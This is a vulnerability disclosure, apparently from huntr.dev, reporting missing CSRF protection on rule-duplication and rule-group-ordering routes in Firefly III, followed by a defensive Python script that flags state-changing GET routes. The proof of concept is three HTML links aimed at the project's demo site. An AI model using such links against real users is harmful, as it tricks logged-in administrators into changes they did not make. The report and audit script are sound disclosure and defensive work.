Cross-Site Request Forgery (CSRF) in firefly-iii/firefly-iii
Report: https://huntr.dev/bounties/da82f7b6-4ffc-4109-87a4-a2a790bd44e5/
Description
No CSRF protection on duplicating a rule and on modifying the order of rule groups.
Proof of Concept
<a href="https://demo.firefly-iii.org/rules/duplicate/1">Click Me!</a>
<a href="https://demo.firefly-iii.org/rule-groups/up/1">Click Me!</a>
<a href="https://demo.firefly-iii.org/rule-groups/down/1">Click Me!</a>
Impact
This vulnerability is capable of tricking admin users into duplicating a rule and modifying the order of rule groups.
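The three PoC links are plain GET requests that change state, so a token check applied only to POST-style requests never sees them. As an added example (not part of the report or of Firefly III's code), this Python audit flags routes that accept GET while naming a state-changing action in their path. The route list is a constructed sample in the shape assumed for Laravel's `php artisan route:list --json`; the parameter names and the action words beyond `duplicate`, `up` and `down` are assumptions.

```python
import json

# Path segments that name a state-changing action. The first three come from
# the PoC URLs in the report; the rest are assumed common cases.
MUTATING_SEGMENTS = {"duplicate", "up", "down", "delete", "destroy", "remove", "reset"}

# Constructed sample in the shape assumed for `php artisan route:list --json`.
SAMPLE_ROUTES = json.dumps([
    {"method": "GET|HEAD", "uri": "rules/duplicate/{rule}", "middleware": ["web"]},
    {"method": "GET|HEAD", "uri": "rule-groups/up/{ruleGroup}", "middleware": ["web"]},
    {"method": "GET|HEAD", "uri": "rule-groups/down/{ruleGroup}", "middleware": ["web"]},
    {"method": "GET|HEAD", "uri": "rules/show/{rule}", "middleware": ["web"]},
    {"method": "POST", "uri": "rules/delete/{rule}", "middleware": ["web"]},
    {"method": "GET|HEAD", "uri": "downloads/{file}", "middleware": ["web"]},
])


def find_unsafe_get_routes(route_list_json):
    """Return (uri, matched_actions) for every GET route whose path names a mutation."""
    findings = []
    for route in json.loads(route_list_json):
        methods = set(route["method"].upper().split("|"))
        if "GET" not in methods:
            continue  # non-GET routes are expected to carry a CSRF token
        # Compare whole literal segments only, so "downloads" does not match "down"
        # and route parameters such as {rule} are ignored.
        segments = [s.lower() for s in route["uri"].strip("/").split("/")
                    if s and not s.startswith("{")]
        hits = MUTATING_SEGMENTS.intersection(segments)
        if hits:
            findings.append((route["uri"], sorted(hits)))
    return findings


if __name__ == "__main__":
    for uri, actions in find_unsafe_get_routes(SAMPLE_ROUTES):
        print(f"GET route changes state ({', '.join(actions)}): {uri}")
```

Each flagged route is a candidate for moving to a POST form that carries the application's CSRF token.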